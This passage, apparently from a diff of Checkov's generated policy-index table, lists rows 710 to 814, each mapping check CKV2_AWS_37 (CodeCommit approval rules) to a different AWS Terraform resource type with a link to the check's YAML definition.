[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 711 | CKV2_AWS_37 | resource | 
aws_db_instance_role_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 712 | CKV2_AWS_37 | resource | aws_db_option_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 713 | CKV2_AWS_37 | resource | aws_db_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 714 | CKV2_AWS_37 | resource | aws_db_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 715 | CKV2_AWS_37 | resource | aws_db_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 716 | CKV2_AWS_37 | resource | aws_db_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 717 | CKV2_AWS_37 | resource | aws_default_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 718 
| CKV2_AWS_37 | resource | aws_default_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 719 | CKV2_AWS_37 | resource | aws_default_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 720 | CKV2_AWS_37 | resource | aws_default_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 721 | CKV2_AWS_37 | resource | aws_default_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 722 | CKV2_AWS_37 | resource | aws_default_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 723 | CKV2_AWS_37 | resource | aws_devicefarm_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 724 | CKV2_AWS_37 | resource | aws_directory_service_conditional_forwarder | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 725 | CKV2_AWS_37 | resource | aws_directory_service_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 726 | CKV2_AWS_37 | resource | aws_directory_service_log_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 727 | CKV2_AWS_37 | resource | aws_dlm_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 728 | CKV2_AWS_37 | resource | aws_dms_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 729 | CKV2_AWS_37 | resource | aws_dms_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 730 | CKV2_AWS_37 | resource | aws_dms_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 731 | CKV2_AWS_37 | resource | aws_dms_replication_instance | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 732 | CKV2_AWS_37 | resource | aws_dms_replication_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 733 | CKV2_AWS_37 | resource | aws_dms_replication_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 734 | CKV2_AWS_37 | resource | aws_docdb_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 735 | CKV2_AWS_37 | resource | aws_docdb_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 736 | CKV2_AWS_37 | resource | aws_docdb_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 737 | CKV2_AWS_37 | resource | aws_docdb_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 
738 | CKV2_AWS_37 | resource | aws_docdb_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 739 | CKV2_AWS_37 | resource | aws_dx_bgp_peer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 740 | CKV2_AWS_37 | resource | aws_dx_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 741 | CKV2_AWS_37 | resource | aws_dx_connection_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 742 | CKV2_AWS_37 | resource | aws_dx_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 743 | CKV2_AWS_37 | resource | aws_dx_gateway_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 744 | CKV2_AWS_37 | resource | aws_dx_gateway_association_proposal | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 745 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 746 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 747 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 748 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 749 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 750 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 751 | CKV2_AWS_37 | resource | aws_dx_lag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 752 | CKV2_AWS_37 | resource | aws_dx_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 753 | CKV2_AWS_37 | resource | aws_dx_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 754 | CKV2_AWS_37 | resource | aws_dx_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 755 | CKV2_AWS_37 | resource | aws_dynamodb_global_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 756 | CKV2_AWS_37 | resource | aws_dynamodb_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 757 | CKV2_AWS_37 | resource | aws_dynamodb_table_item | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 758 | CKV2_AWS_37 | resource | aws_ebs_default_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 759 | CKV2_AWS_37 | resource | aws_ebs_encryption_by_default | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 760 | CKV2_AWS_37 | resource | aws_ebs_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 761 | CKV2_AWS_37 | resource | aws_ebs_snapshot_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 762 | CKV2_AWS_37 | resource | aws_ebs_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 763 | CKV2_AWS_37 | resource | aws_ec2_availability_zone_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 764 | CKV2_AWS_37 | resource | 
aws_ec2_capacity_reservation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 765 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_authorization_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 766 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 767 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_network_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 768 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 769 | CKV2_AWS_37 | resource | aws_ec2_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 770 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 771 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route_table_vpc_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 772 | CKV2_AWS_37 | resource | aws_ec2_tag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 773 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 774 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 775 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_session | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 776 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 777 | CKV2_AWS_37 | resource | 
aws_ec2_transit_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 778 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 779 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 780 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 781 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 782 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 783 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_propagation | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 784 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 785 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 786 | CKV2_AWS_37 | resource | aws_ecr_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 787 | CKV2_AWS_37 | resource | aws_ecr_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 788 | CKV2_AWS_37 | resource | aws_ecr_repository_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 789 | CKV2_AWS_37 | resource | aws_ecs_capacity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 790 | CKV2_AWS_37 | resource | 
aws_ecs_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 791 | CKV2_AWS_37 | resource | aws_ecs_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 792 | CKV2_AWS_37 | resource | aws_ecs_task_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 793 | CKV2_AWS_37 | resource | aws_efs_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 794 | CKV2_AWS_37 | resource | aws_efs_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 795 | CKV2_AWS_37 | resource | aws_efs_file_system_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 796 | CKV2_AWS_37 | resource | aws_efs_mount_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 797 | 
CKV2_AWS_37 | resource | aws_egress_only_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 798 | CKV2_AWS_37 | resource | aws_eip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 799 | CKV2_AWS_37 | resource | aws_eip_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 800 | CKV2_AWS_37 | resource | aws_eks_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 801 | CKV2_AWS_37 | resource | aws_eks_fargate_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 802 | CKV2_AWS_37 | resource | aws_eks_node_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 803 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 804 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 805 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_configuration_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 806 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 807 | CKV2_AWS_37 | resource | aws_elasticache_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 808 | CKV2_AWS_37 | resource | aws_elasticache_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 809 | CKV2_AWS_37 | resource | aws_elasticache_replication_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 810 | 
CKV2_AWS_37 | resource | aws_elasticache_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 811 | CKV2_AWS_37 | resource | aws_elasticache_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 812 | CKV2_AWS_37 | resource | aws_elasticsearch_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 813 | CKV2_AWS_37 | resource | aws_elasticsearch_domain_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 814 | CKV2_AWS_37 | resource | aws_elastictranscoder_pipeline | Ensure CodeCommit associates an approval rule | Terraform | 